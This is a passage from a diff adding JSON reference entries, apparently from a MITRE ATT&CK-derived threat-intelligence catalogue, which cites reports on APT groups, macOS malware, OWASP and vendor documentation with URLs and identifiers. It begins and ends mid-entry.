hidden hacking groups" + }, + "related": [], + "uuid": "aa3e31c7-71cd-4a3f-b482-9049c9abb631", + "value": "FoxIT Wocao December 2019" + }, + { + "description": "Cedric Pernet, Kenney Lu. (2015, March 19). Operation Woolen-Goldfish - When Kittens Go phishing. Retrieved April 21, 2021.", + "meta": { + "date_accessed": "2021-04-21T00:00:00Z", + "date_published": "2015-03-19T00:00:00Z", + "refs": [ + "https://documents.trendmicro.com/assets/wp/wp-operation-woolen-goldfish.pdf" + ], + "source": "MITRE", + "title": "Operation Woolen-Goldfish - When Kittens Go phishing" + }, + "related": [], + "uuid": "0f077c93-aeda-4c95-9996-c52812a31267", + "value": "TrendMicro Operation Woolen Goldfish March 2015" + }, + { + "description": "I. Ilascu. (2019, March 3). Op 'Sharpshooter' Connected to North Korea's Lazarus Group. Retrieved September 26, 2022.", + "meta": { + "date_accessed": "2022-09-26T00:00:00Z", + "date_published": "2019-03-03T00:00:00Z", + "refs": [ + "https://www.bleepingcomputer.com/news/security/op-sharpshooter-connected-to-north-koreas-lazarus-group/" + ], + "source": "MITRE", + "title": "Op 'Sharpshooter' Connected to North Korea's Lazarus Group" + }, + "related": [], + "uuid": "84430646-6568-4288-8710-2827692a8862", + "value": "Bleeping Computer Op Sharpshooter March 2019" + }, + { + "description": "Symantec Security Response Attack Investigation Team. (2018, April 23). Orangeworm: Indicators of Compromise. Retrieved July 8, 2018.", + "meta": { + "date_accessed": "2018-07-08T00:00:00Z", + "date_published": "2018-04-23T00:00:00Z", + "refs": [ + "https://symantec-enterprise-blogs.security.com/sites/default/files/2018-04/Orangeworm%20IOCs.pdf" + ], + "source": "MITRE", + "title": "Orangeworm: Indicators of Compromise" + }, + "related": [], + "uuid": "293596ad-a13f-456b-8916-d1e1b1afe0da", + "value": "Symantec Orangeworm IOCs April 2018" + }, + { + "description": "Symantec Threat Intelligence. (2020, June 25). WastedLocker: Symantec Identifies Wave of Attacks Against U.S. Organizations. Retrieved May 20, 2021.", + "meta": { + "date_accessed": "2021-05-20T00:00:00Z", + "refs": [ + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/wastedlocker-ransomware-us" + ], + "source": "MITRE", + "title": "Organizations" + }, + "related": [], + "uuid": "061d8f74-a202-4089-acae-687e4f96933b", + "value": "Symantec WastedLocker June 2020" + }, + { + "description": "Pantig, J. (2018, July 30). OSX.Calisto. Retrieved September 7, 2018.", + "meta": { + "date_accessed": "2018-09-07T00:00:00Z", + "date_published": "2018-07-30T00:00:00Z", + "refs": [ + "https://web.archive.org/web/20190111082249/https://www.symantec.com/security-center/writeup/2018-073014-2512-99?om_rssid=sr-latestthreats30days" + ], + "source": "MITRE", + "title": "OSX.Calisto" + }, + "related": [], + "uuid": "cefef3d8-94f5-4d94-9689-6ed38702454f", + "value": "Symantec Calisto July 2018" + }, + { + "description": "Wardle, P. (2021, November 11). OSX.CDDS (OSX.MacMa). Retrieved June 30, 2022.", + "meta": { + "date_accessed": "2022-06-30T00:00:00Z", + "date_published": "2021-11-11T00:00:00Z", + "refs": [ + "https://objective-see.org/blog/blog_0x69.html" + ], + "source": "MITRE", + "title": "OSX.CDDS (OSX.MacMa)" + }, + "related": [], + "uuid": "7240261e-d901-4a68-b6fc-deec308e8a50", + "value": "Objective-See MacMa Nov 2021" + }, + { + "description": "fluffybunny. (2019, July 9). OSX.Dok Analysis. Retrieved October 4, 2021.", + "meta": { + "date_accessed": "2021-10-04T00:00:00Z", + "date_published": "2019-07-09T00:00:00Z", + "refs": [ + "http://www.hexed.in/2019/07/osxdok-analysis.html" + ], + "source": "MITRE", + "title": "OSX.Dok Analysis" + }, + "related": [], + "uuid": "96f9d36a-01a5-418e-85f4-957e58d49c1b", + "value": "hexed osx.dok analysis 2019" + }, + { + "description": "Thomas Reed. (2020, April 21). OSX.DubRobber. Retrieved October 5, 2021.", + "meta": { + "date_accessed": "2021-10-05T00:00:00Z", + "date_published": "2020-04-21T00:00:00Z", + "refs": [ + "https://blog.malwarebytes.com/detections/osx-dubrobber/" + ], + "source": "MITRE", + "title": "OSX.DubRobber" + }, + "related": [], + "uuid": "11ef576f-1bac-49e3-acba-85d70a42503e", + "value": "malwarebyteslabs xcsset dubrobber" + }, + { + "description": "Patrick Wardle. (2020, July 3). OSX.EvilQuest Uncovered part ii: insidious capabilities. Retrieved March 21, 2021.", + "meta": { + "date_accessed": "2021-03-21T00:00:00Z", + "date_published": "2020-07-03T00:00:00Z", + "refs": [ + "https://objective-see.com/blog/blog_0x60.html" + ], + "source": "MITRE", + "title": "OSX.EvilQuest Uncovered part ii: insidious capabilities" + }, + "related": [], + "uuid": "4fee237c-c2ec-47f5-b382-ec6bd4779281", + "value": "wardle evilquest partii" + }, + { + "description": "Patrick Wardle. (2020, June 29). OSX.EvilQuest Uncovered part i: infection, persistence, and more!. Retrieved March 18, 2021.", + "meta": { + "date_accessed": "2021-03-18T00:00:00Z", + "date_published": "2020-06-29T00:00:00Z", + "refs": [ + "https://objective-see.com/blog/blog_0x59.html" + ], + "source": "MITRE", + "title": "OSX.EvilQuest Uncovered part i: infection, persistence, and more!" + }, + "related": [], + "uuid": "1ebd91db-9b56-442f-bb61-9e154b5966ac", + "value": "wardle evilquest parti" + }, + { + "description": "ESET. (2012, January 1). OSX/Flashback. Retrieved April 19, 2022.", + "meta": { + "date_accessed": "2022-04-19T00:00:00Z", + "date_published": "2012-01-01T00:00:00Z", + "refs": [ + "https://www.welivesecurity.com/wp-content/uploads/200x/white-papers/osx_flashback.pdf" + ], + "source": "MITRE", + "title": "OSX/Flashback" + }, + "related": [], + "uuid": "ce6e5a21-0063-4356-a77a-5c5f9fd2cf5c", + "value": "eset_osx_flashback" + }, + { + "description": "Ofer Caspi. (2017, May 4). OSX Malware is Catching Up, and it wants to Read Your HTTPS Traffic. Retrieved October 5, 2021.", + "meta": { + "date_accessed": "2021-10-05T00:00:00Z", + "date_published": "2017-05-04T00:00:00Z", + "refs": [ + "https://blog.checkpoint.com/2017/04/27/osx-malware-catching-wants-read-https-traffic/" + ], + "source": "MITRE", + "title": "OSX Malware is Catching Up, and it wants to Read Your HTTPS Traffic" + }, + "related": [], + "uuid": "8c178fd8-db34-45c6-901a-a8b2c178d809", + "value": "CheckPoint Dok" + }, + { + "description": "Long, Joshua. (2018, February 21). OSX/Shlayer: New Mac malware comes out of its shell. Retrieved August 28, 2019.", + "meta": { + "date_accessed": "2019-08-28T00:00:00Z", + "date_published": "2018-02-21T00:00:00Z", + "refs": [ + "https://www.intego.com/mac-security-blog/osxshlayer-new-mac-malware-comes-out-of-its-shell/" + ], + "source": "MITRE", + "title": "OSX/Shlayer: New Mac malware comes out of its shell" + }, + "related": [], + "uuid": "46eb883c-e203-4cd9-8f1c-c6ea12bc2742", + "value": "Intego Shlayer Feb 2018" + }, + { + "description": "Stalmans, E. (2017, April 28). Outlook Forms and Shells. Retrieved February 4, 2019.", + "meta": { + "date_accessed": "2019-02-04T00:00:00Z", + "date_published": "2017-04-28T00:00:00Z", + "refs": [ + "https://sensepost.com/blog/2017/outlook-forms-and-shells/" + ], + "source": "MITRE", + "title": "Outlook Forms and Shells" + }, + "related": [], + "uuid": "5d91a713-2f05-43bd-9fef-aa3f51f4c45a", + "value": "SensePost Outlook Forms" + }, + { + "description": "Stalmans, E. (2017, October 11). Outlook Home Page – Another Ruler Vector. Retrieved February 4, 2019.", + "meta": { + "date_accessed": "2019-02-04T00:00:00Z", + "date_published": "2017-10-11T00:00:00Z", + "refs": [ + "https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/" + ], + "source": "MITRE", + "title": "Outlook Home Page – Another Ruler Vector" + }, + "related": [], + "uuid": "d2758a4b-d326-45a7-9ebf-03efcd1832da", + "value": "SensePost Outlook Home Page" + }, + { + "description": "Soutcast. (2018, September 14). Outlook Today Homepage Persistence. Retrieved February 5, 2019.", + "meta": { + "date_accessed": "2019-02-05T00:00:00Z", + "date_published": "2018-09-14T00:00:00Z", + "refs": [ + "https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943" + ], + "source": "MITRE", + "title": "Outlook Today Homepage Persistence" + }, + "related": [], + "uuid": "cb7beffb-a955-40fd-b114-de6533efc80d", + "value": "Outlook Today Home Page" + }, + { + "description": "Recorded Future. (2019, June 20). Out of the Blue: How Recorded Future Identified Rogue Cobalt Strike Servers. Retrieved October 16, 2020.", + "meta": { + "date_accessed": "2020-10-16T00:00:00Z", + "date_published": "2019-06-20T00:00:00Z", + "refs": [ + "https://www.recordedfuture.com/identifying-cobalt-strike-servers/" + ], + "source": "MITRE", + "title": "Out of the Blue: How Recorded Future Identified Rogue Cobalt Strike Servers" + }, + "related": [], + "uuid": "4e554042-53bb-44d4-9acc-44c86329ac47", + "value": "Recorded Future Beacon 2019" + }, + { + "description": "Ackerman, G., et al. (2018, December 21). OVERRULED: Containing a Potentially Destructive Adversary. Retrieved January 17, 2019.", + "meta": { + "date_accessed": "2019-01-17T00:00:00Z", + "date_published": "2018-12-21T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html" + ], + "source": "MITRE", + "title": "OVERRULED: Containing a Potentially Destructive Adversary" + }, + "related": [], + "uuid": "4b4c9e72-eee1-4fa4-8dcb-501ec49882b0", + "value": "FireEye APT33 Guardrail" + }, + { + "description": "Kubernetes. (n.d.). Overview of Cloud Native Security. Retrieved March 8, 2023.", + "meta": { + "date_accessed": "2023-03-08T00:00:00Z", + "refs": [ + "https://kubernetes.io/docs/concepts/security/overview/" + ], + "source": "MITRE", + "title": "Overview of Cloud Native Security" + }, + "related": [], + "uuid": "55ee5bcc-ba56-58ac-9afb-2349aa75fe39", + "value": "Kubernetes Cloud Native Security" + }, + { + "description": "Apple Inc.. (2012, July 23). Overview of Dynamic Libraries. Retrieved March 24, 2021.", + "meta": { + "date_accessed": "2021-03-24T00:00:00Z", + "date_published": "2012-07-23T00:00:00Z", + "refs": [ + "https://developer.apple.com/library/archive/documentation/DeveloperTools/Conceptual/DynamicLibraries/100-Articles/OverviewOfDynamicLibraries.html" + ], + "source": "MITRE", + "title": "Overview of Dynamic Libraries" + }, + "related": [], + "uuid": "e3b8cc52-2096-418c-b291-1bc76022961d", + "value": "Apple Doco Archive Dynamic Libraries" + }, + { + "description": "Apple. (2012, July 23). Overview of Dynamic Libraries. Retrieved September 7, 2023.", + "meta": { + "date_accessed": "2023-09-07T00:00:00Z", + "date_published": "2012-07-23T00:00:00Z", + "refs": [ + "https://developer.apple.com/library/archive/documentation/DeveloperTools/Conceptual/DynamicLibraries/100-Articles/OverviewOfDynamicLibraries.html" + ], + "source": "MITRE", + "title": "Overview of Dynamic Libraries" + }, + "related": [], + "uuid": "39ffd162-4052-57ec-bd20-2fe6b8e6beab", + "value": "Apple Dev Dynamic Libraries" + }, + { + "description": "The Kubeflow Authors. (n.d.). Overview of Kubeflow Pipelines. Retrieved March 29, 2021.", + "meta": { + "date_accessed": "2021-03-29T00:00:00Z", + "refs": [ + "https://www.kubeflow.org/docs/components/pipelines/overview/pipelines-overview/" + ], + "source": "MITRE", + "title": "Overview of Kubeflow Pipelines" + }, + "related": [], + "uuid": "0b40474c-173c-4a8c-8cc7-bac2dcfcaedd", + "value": "Kubeflow Pipelines" + }, + { + "description": "Microsoft. (n.d.). Overview of Remote Desktop Gateway. Retrieved June 6, 2016.", + "meta": { + "date_accessed": "2016-06-06T00:00:00Z", + "refs": [ + "https://technet.microsoft.com/en-us/library/cc731150.aspx" + ], + "source": "MITRE", + "title": "Overview of Remote Desktop Gateway" + }, + "related": [], + "uuid": "3e832a4f-b8e6-4c28-bb33-f2db817403b9", + "value": "TechNet RDP Gateway" + }, + { + "description": "Wiley, B. et al. (2021, December 29). OverWatch Exposes AQUATIC PANDA in Possession of Log4Shell Exploit Tools During Hands-on Intrusion Attempt. Retrieved January 18, 2022.", + "meta": { + "date_accessed": "2022-01-18T00:00:00Z", + "date_published": "2021-12-29T00:00:00Z", + "refs": [ + "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/" + ], + "source": "MITRE, Tidal Cyber", + "title": "OverWatch Exposes AQUATIC PANDA in Possession of Log4Shell Exploit Tools During Hands-on Intrusion Attempt" + }, + "related": [], + "uuid": "fd095ef2-6fc2-4f6f-9e4f-037b2a9217d2", + "value": "CrowdStrike AQUATIC PANDA December 2021" + }, + { + "description": "OWASP. (2017, April 16). OWASP Top 10 2017 - The Ten Most Critical Web Application Security Risks. Retrieved February 12, 2019.", + "meta": { + "date_accessed": "2019-02-12T00:00:00Z", + "date_published": "2017-04-16T00:00:00Z", + "refs": [ + "https://owasp.org/www-project-top-ten/OWASP_Top_Ten_2017/" + ], + "source": "MITRE", + "title": "OWASP Top 10 2017 - The Ten Most Critical Web Application Security Risks" + }, + "related": [], + "uuid": "044ef2b7-44cc-4da6-b8e2-45d630558534", + "value": "OWASP Top 10 2017" + }, + { + "description": "OWASP. (2018, February 23). OWASP Top Ten Project. Retrieved April 3, 2018.", + "meta": { + "date_accessed": "2018-04-03T00:00:00Z", + "date_published": "2018-02-23T00:00:00Z", + "refs": [ + "https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project" + ], + "source": "MITRE", + "title": "OWASP Top Ten Project" + }, + "related": [], + "uuid": "c6db3a77-4d01-4b4d-886d-746d676ed6d0", + "value": "OWASP Top 10" + }, + { + "description": "Debian Policy Manual v4.6.1.1. (2022, August 14). Package maintainer scripts and installation procedure. Retrieved September 27, 2022.", + "meta": { + "date_accessed": "2022-09-27T00:00:00Z", + "date_published": "2022-08-14T00:00:00Z", + "refs": [ + "https://www.debian.org/doc/debian-policy/ch-maintainerscripts.html#s-mscriptsinstact" + ], + "source": "MITRE", + "title": "Package maintainer scripts and installation procedure" + }, + "related": [], + "uuid": "e32e293a-f583-494e-9eb5-c82167f2e000", + "value": "Debian Manual Maintainer Scripts" + }, + { + "description": "Google Cloud. (n.d.). Packet Mirroring overview. Retrieved March 17, 2022.", + "meta": { + "date_accessed": "2022-03-17T00:00:00Z", + "refs": [ + "https://cloud.google.com/vpc/docs/packet-mirroring" + ], + "source": "MITRE", + "title": "Packet Mirroring overview" + }, + "related": [], + "uuid": "c91c6399-3520-4410-936d-48c3b13235ca", + "value": "GCP Packet Mirroring" + }, + { + "description": "Scott-Railton, J., et al. (2015, December 8). Packrat. Retrieved December 18, 2020.", + "meta": { + "date_accessed": "2020-12-18T00:00:00Z", + "date_published": "2015-12-08T00:00:00Z", + "refs": [ + "https://citizenlab.ca/2015/12/packrat-report/" + ], + "source": "MITRE", + "title": "Packrat" + }, + "related": [], + "uuid": "316f347f-3e92-4861-a075-db64adf6b6a8", + "value": "Citizenlab Packrat 2015" + }, + { + "description": "Rhino Security Labs. (2019, August 22). Pacu. Retrieved October 17, 2019.", + "meta": { + "date_accessed": "2019-10-17T00:00:00Z", + "date_published": "2019-08-22T00:00:00Z", + "refs": [ + "https://github.com/RhinoSecurityLabs/pacu" + ], + "source": "MITRE", + "title": "Pacu" + }, + "related": [], + "uuid": "bda43b1b-ea8d-4371-9984-6d8a7cc24965", + "value": "GitHub Pacu" + }, + { + "description": "Rhino Security Labs. (2021, April 29). Pacu Detection Disruption Module. Retrieved August 4, 2023.", + "meta": { + "date_accessed": "2023-08-04T00:00:00Z", + "date_published": "2021-04-29T00:00:00Z", + "refs": [ + "https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu/modules/detection__disruption/main.py" + ], + "source": "MITRE", + "title": "Pacu Detection Disruption Module" + }, + "related": [], + "uuid": "deba605b-7abc-5794-a820-448a395aab69", + "value": "Pacu Detection Disruption Module" + }, + { + "description": "Threat Intelligence. (2020, September 29). Palmerworm: Espionage Gang Targets the Media, Finance, and Other Sectors. Retrieved March 25, 2022.", + "meta": { + "date_accessed": "2022-03-25T00:00:00Z", + "date_published": "2020-09-29T00:00:00Z", + "refs": [ + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/palmerworm-blacktech-espionage-apt" + ], + "source": "MITRE, Tidal Cyber", + "title": "Palmerworm: Espionage Gang Targets the Media, Finance, and Other Sectors" + }, + "related": [], + "uuid": "84ecd475-8d3f-4e7c-afa8-2dff6078bed5", + "value": "Symantec Palmerworm Sep 2020" + }, + { + "description": "Apple. (2011, May 11). PAM - Pluggable Authentication Modules. Retrieved June 25, 2020.", + "meta": { + "date_accessed": "2020-06-25T00:00:00Z", + "date_published": "2011-05-11T00:00:00Z", + "refs": [ + "https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt" + ], + "source": "MITRE", + "title": "PAM - Pluggable Authentication Modules" + }, + "related": [], + "uuid": "4838a58e-c00d-4b4c-937d-8da5d9f1a4b5", + "value": "Apple PAM" + }, + { + "description": "die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June 25, 2020.", + "meta": { + "date_accessed": "2020-06-25T00:00:00Z", + "refs": [ + "https://linux.die.net/man/8/pam_unix" + ], + "source": "MITRE", + "title": "pam_unix(8) - Linux man page" + }, + "related": [], + "uuid": "6bc5ad93-3cc2-4429-ac4c-aae72193df27", + "value": "Man Pam_Unix" + }, + { + "description": "Lancaster, T. and Idrizovic, E.. (2017, June 27). Paranoid PlugX. Retrieved July 13, 2017.", + "meta": { + "date_accessed": "2017-07-13T00:00:00Z", + "date_published": "2017-06-27T00:00:00Z", + "refs": [ + "https://researchcenter.paloaltonetworks.com/2017/06/unit42-paranoid-plugx/" + ], + "source": "MITRE", + "title": "Paranoid PlugX" + }, + "related": [], + "uuid": "27f17e79-ef38-4c20-9250-40c81fa8717a", + "value": "Palo Alto PlugX June 2017" + }, + { + "description": "Lancaster, T., Idrizovic, E. (2017, June 27). Paranoid PlugX. Retrieved April 19, 2019.", + "meta": { + "date_accessed": "2019-04-19T00:00:00Z", + "date_published": "2017-06-27T00:00:00Z", + "refs": [ + "https://unit42.paloaltonetworks.com/unit42-paranoid-plugx/" + ], + "source": "MITRE", + "title": "Paranoid PlugX" + }, + "related": [], + "uuid": "9dc629a0-543c-4221-86cc-0dfb93903988", + "value": "Unit42 PlugX June 2017" + }, + { + "description": "Secuirtyinbits . (2019, May 14). Parent PID Spoofing (Stage 2) Ataware Ransomware Part 3. Retrieved June 6, 2019.", + "meta": { + "date_accessed": "2019-06-06T00:00:00Z", + "date_published": "2019-05-14T00:00:00Z", + "refs": [ + "https://www.securityinbits.com/malware-analysis/parent-pid-spoofing-stage-2-ataware-ransomware-part-3" + ], + "source": "MITRE", + "title": "Parent PID Spoofing (Stage 2) Ataware Ransomware Part 3" + }, + "related": [], + "uuid": "0828b2fd-c85f-44c7-bb05-61e6eba34336", + "value": "Secuirtyinbits Ataware3 May 2019" + }, + { + "description": "Dragos. (n.d.). PARISITE. Retrieved December 21, 2020.", + "meta": { + "date_accessed": "2020-12-21T00:00:00Z", + "refs": [ + "https://www.dragos.com/threat/parisite/" + ], + "source": "MITRE", + "title": "PARISITE" + }, + "related": [], + "uuid": "15e974db-51a9-4ec1-9725-cff8bb9bc2fa", + "value": "Dragos PARISITE" + }, + { + "description": "Department of Justice. (2018, September 6). Criminal Complaint - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.", + "meta": { + "date_accessed": "2019-03-29T00:00:00Z", + "refs": [ + "https://www.justice.gov/opa/press-release/file/1092091/download" + ], + "source": "MITRE", + "title": "PARK JIN HYOK" + }, + "related": [], + "uuid": "950f8c1e-8793-43b7-abc7-0c9f6790b3b7", + "value": "DOJ Lazarus Sony 2018" + }, + { + "description": "Ignacio Sanmillan. (2018, February 7). Executable and Linkable Format 101. Part 2: Symbols. Retrieved September 29, 2022.", + "meta": { + "date_accessed": "2022-09-29T00:00:00Z", + "refs": [ + "https://www.intezer.com/blog/malware-analysis/executable-linkable-format-101-part-2-symbols/" + ], + "source": "MITRE", + "title": "Part 2: Symbols" + }, + "related": [], + "uuid": "2d1faa93-fed5-4b0d-b6c9-72bbc4782201", + "value": "intezer stripped binaries elf files 2018" + }, + { + "description": "Jon Gabilondo. (2019, September 22). How to Inject Code into Mach-O Apps. Part II.. Retrieved March 24, 2021.", + "meta": { + "date_accessed": "2021-03-24T00:00:00Z", + "refs": [ + "https://jon-gabilondo-angulo-7635.medium.com/how-to-inject-code-into-mach-o-apps-part-ii-ddb13ebc8191" + ], + "source": "MITRE", + "title": "Part II." + }, + "related": [], + "uuid": "67f3ce33-0197-41ef-a9d0-474c97ecf570", + "value": "Gabilondo DYLD_INSERT_LIBRARIES Catalina Bypass" + }, + { + "description": "Microsoft. (n.d.). Partners: Offer delegated administration. Retrieved May 27, 2022.", + "meta": { + "date_accessed": "2022-05-27T00:00:00Z", + "refs": [ + "https://support.microsoft.com/en-us/topic/partners-offer-delegated-administration-26530dc0-ebba-415b-86b1-b55bc06b073e?ui=en-us&rs=en-us&ad=us" + ], + "source": "MITRE", + "title": "Partners: Offer delegated administration" + }, + "related": [], + "uuid": "fa0ed0fd-bf57-4a0f-9370-e22f27b20e42", + "value": "Office 365 Delegated Administration" + }, + { + "description": "Microsoft. (2015, July 30). Part of Windows 10 or really Malware?. Retrieved December 18, 2017.", + "meta": { + "date_accessed": "2017-12-18T00:00:00Z", + "date_published": "2015-07-30T00:00:00Z", + "refs": [ + "https://answers.microsoft.com/windows/forum/windows_10-security/part-of-windows-10-or-really-malware/af715663-a34a-423c-850d-2a46f369a54c" + ], + "source": "MITRE", + "title": "Part of Windows 10 or really Malware?" + }, + "related": [], + "uuid": "183843b5-66dc-4229-ba66-3171d9b8e33d", + "value": "Microsoft IFEOorMalware July 2015" + }, + { + "description": "CIRCL Computer Incident Response Center. (n.d.). Passive DNS. Retrieved October 20, 2020.", + "meta": { + "date_accessed": "2020-10-20T00:00:00Z", + "refs": [ + "https://www.circl.lu/services/passive-dns/" + ], + "source": "MITRE", + "title": "Passive DNS" + }, + "related": [], + "uuid": "c19f8683-97fb-4e0c-a9f5-12033b1d38ca", + "value": "Circl Passive DNS" + }, + { + "description": "Patrick Wardle. (2019, October 12). Pass the AppleJeus. Retrieved September 28, 2022.", + "meta": { + "date_accessed": "2022-09-28T00:00:00Z", + "date_published": "2019-10-12T00:00:00Z", + "refs": [ + "https://objective-see.org/blog/blog_0x49.html" + ], + "source": "MITRE", + "title": "Pass the AppleJeus" + }, + "related": [], + "uuid": "4cfec669-1db5-4a67-81e2-18383e4c4d3d", + "value": "ObjectiveSee AppleJeus 2019" + }, + { + "description": "Deply, B. (2014, January 13). Pass the ticket. Retrieved June 2, 2016.", + "meta": { + "date_accessed": "2016-06-02T00:00:00Z", + "date_published": "2014-01-13T00:00:00Z", + "refs": [ + "http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos" + ], + "source": "MITRE", + "title": "Pass the ticket" + }, + "related": [], + "uuid": "3ff12b9c-1c4e-4383-a771-792f5e95dcf1", + "value": "GentilKiwi Pass the Ticket" + }, + { + "description": "Wikipedia. (n.d.). Password cracking. Retrieved December 23, 2015.", + "meta": { + "date_accessed": "2015-12-23T00:00:00Z", + "refs": [ + "https://en.wikipedia.org/wiki/Password_cracking" + ], + "source": "MITRE", + "title": "Password cracking" + }, + "related": [], + "uuid": "d5ebb79f-b39a-46cb-b546-2db383783a58", + "value": "Wikipedia Password cracking" + }, + { + "description": "Korznikov, A. (2017, March 17). Passwordless RDP Session Hijacking Feature All Windows versions. Retrieved December 11, 2017.", + "meta": { + "date_accessed": "2017-12-11T00:00:00Z", + "date_published": "2017-03-17T00:00:00Z", + "refs": [ + "http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html" + ], + "source": "MITRE", + "title": "Passwordless RDP Session Hijacking Feature All Windows versions" + }, + "related": [], + "uuid": "8877e1f3-11e6-4ae0-adbd-c9b98b07ee25", + "value": "RDP Hijacking Korznikov" + }, + { + "description": "ise. (2019, February 19). Password Managers: Under the Hood of Secrets Management. Retrieved January 22, 2021.", + "meta": { + "date_accessed": "2021-01-22T00:00:00Z", + "date_published": "2019-02-19T00:00:00Z", + "refs": [ + "https://www.ise.io/casestudies/password-manager-hacking/" + ], + "source": "MITRE", + "title": "Password Managers: Under the Hood of Secrets Management" + }, + "related": [], + "uuid": "253104ab-20b0-43d2-8338-afdd3237cc53", + "value": "ise Password Manager February 2019" + }, + { + "description": "Hall, J., Lich, B. (2017, September 9). Password must meet complexity requirements. Retrieved April 5, 2018.", + "meta": { + "date_accessed": "2018-04-05T00:00:00Z", + "date_published": "2017-09-09T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/password-must-meet-complexity-requirements" + ], + "source": "MITRE", + "title": "Password must meet complexity requirements" + }, + "related": [], + "uuid": "918d4b6c-5783-4332-96d9-430e4c5ae030", + "value": "Microsoft Password Complexity" + }, + { + "description": "Thyer, J. (2015, October 30). Password Spraying & Other Fun with RPCCLIENT. Retrieved April 25, 2017.", + "meta": { + "date_accessed": "2017-04-25T00:00:00Z", + "date_published": "2015-10-30T00:00:00Z", + "refs": [ + "http://www.blackhillsinfosec.com/?p=4645" + ], + "source": "MITRE", + "title": "Password Spraying & Other Fun with RPCCLIENT" + }, + "related": [], + "uuid": "f45c7a4b-dafc-4e5c-ad3f-db4b0388a1d7", + "value": "BlackHillsInfosec Password Spraying" + }, + { + "description": "Teusink, N. (2009, August 25). Passwords stored using reversible encryption: how it works (part 1). Retrieved November 17, 2021.", + "meta": { + "date_accessed": "2021-11-17T00:00:00Z", + "date_published": "2009-08-25T00:00:00Z", + "refs": [ + "http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html" + ], + "source": "MITRE", + "title": "Passwords stored using reversible encryption: how it works (part 1)" + }, + "related": [], + "uuid": "180246ca-94d8-4c78-894d-ae3b6fad3257", + "value": "how_pwd_rev_enc_1" + }, + { + "description": "Teusink, N. (2009, August 26). Passwords stored using reversible encryption: how it works (part 2). Retrieved November 17, 2021.", + "meta": { + "date_accessed": "2021-11-17T00:00:00Z", + "date_published": "2009-08-26T00:00:00Z", + "refs": [ + "http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html" + ], + "source": "MITRE", + "title": "Passwords stored using reversible encryption: how it works (part 2)" + }, + "related": [], + "uuid": "cc08f190-5c17-441c-a6fa-99f8fdb8d1ae", + "value": "how_pwd_rev_enc_2" + }, + { + "description": "Meltzer, M, et al. (2018, June 07). Patchwork APT Group Targets US Think Tanks. Retrieved July 16, 2018.", + "meta": { + "date_accessed": "2018-07-16T00:00:00Z", + "date_published": "2018-06-07T00:00:00Z", + "refs": [ + "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/" + ], + "source": "MITRE, Tidal Cyber", + "title": "Patchwork APT Group Targets US Think Tanks" + }, + "related": [], + "uuid": "d3ed7dd9-0941-4160-aa6a-c0244c63560f", + "value": "Volexity Patchwork June 2018" + }, + { + "description": "Levene, B. et al.. (2018, March 7). Patchwork Continues to Deliver BADNEWS to the Indian Subcontinent. Retrieved March 31, 2018.", + "meta": { + "date_accessed": "2018-03-31T00:00:00Z", + "date_published": "2018-03-07T00:00:00Z", + "refs": [ + "https://researchcenter.paloaltonetworks.com/2018/03/unit42-patchwork-continues-deliver-badnews-indian-subcontinent/" + ], + "source": "MITRE", + "title": "Patchwork Continues to Deliver BADNEWS to the Indian Subcontinent" + }, + "related": [], + "uuid": "2609e461-1e23-4dc2-aa44-d09f4acb8c6e", + "value": "PaloAlto Patchwork Mar 2018" + }, + { + "description": "Hamada, J.. (2016, July 25). Patchwork cyberespionage group expands targets from governments to wide range of industries. Retrieved August 17, 2016.", + "meta": { + "date_accessed": "2016-08-17T00:00:00Z", + "date_published": "2016-07-25T00:00:00Z", + "refs": [ + "http://www.symantec.com/connect/blogs/patchwork-cyberespionage-group-expands-targets-governments-wide-range-industries" + ], + "source": "MITRE, Tidal Cyber", + "title": "Patchwork cyberespionage group expands targets from governments to wide range of industries" + }, + "related": [], + "uuid": "a6172463-56e2-49f2-856d-f4f8320d7c6e", + "value": "Symantec Patchwork" + }, + { + "description": "Hacquebord, F.. (2017, April 25). Pawn Storm Abuses Open Authentication in Advanced Social Engineering Attacks. Retrieved October 4, 2019.", + "meta": { + "date_accessed": "2019-10-04T00:00:00Z", + "date_published": "2017-04-25T00:00:00Z", + "refs": [ + "https://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-abuses-open-authentication-advanced-social-engineering-attacks" + ], + "source": "MITRE", + "title": "Pawn Storm Abuses Open Authentication in Advanced Social Engineering Attacks" + }, + "related": [], + "uuid": "7d12c764-facd-4086-acd0-5c0287344520", + "value": "Trend Micro Pawn Storm OAuth 2017" + }, + { + "description": "Hacquebord, F. (n.d.). Pawn Storm in 2019 A Year of Scanning and Credential Phishing on High-Profile Targets. Retrieved December 29, 2020.", + "meta": { + "date_accessed": "2020-12-29T00:00:00Z", + "refs": [ + "https://documents.trendmicro.com/assets/white_papers/wp-pawn-storm-in-2019.pdf" + ], + "source": "MITRE", + "title": "Pawn Storm in 2019 A Year of Scanning and Credential Phishing on High-Profile Targets" + }, + "related": [], + "uuid": "104f3264-3e8a-46ca-b9b2-e16a59938570", + "value": "TrendMicro Pawn Storm 2019" + }, + { + "description": "Hacquebord, F., Remorin, L. (2020, December 17). Pawn Storm’s Lack of Sophistication as a Strategy. Retrieved January 13, 2021.", + "meta": { + "date_accessed": "2021-01-13T00:00:00Z", + "date_published": "2020-12-17T00:00:00Z", + "refs": [ + "https://www.trendmicro.com/en_us/research/20/l/pawn-storm-lack-of-sophistication-as-a-strategy.html" + ], + "source": "MITRE", + "title": "Pawn Storm’s Lack of Sophistication as a Strategy" + }, + "related": [], + "uuid": 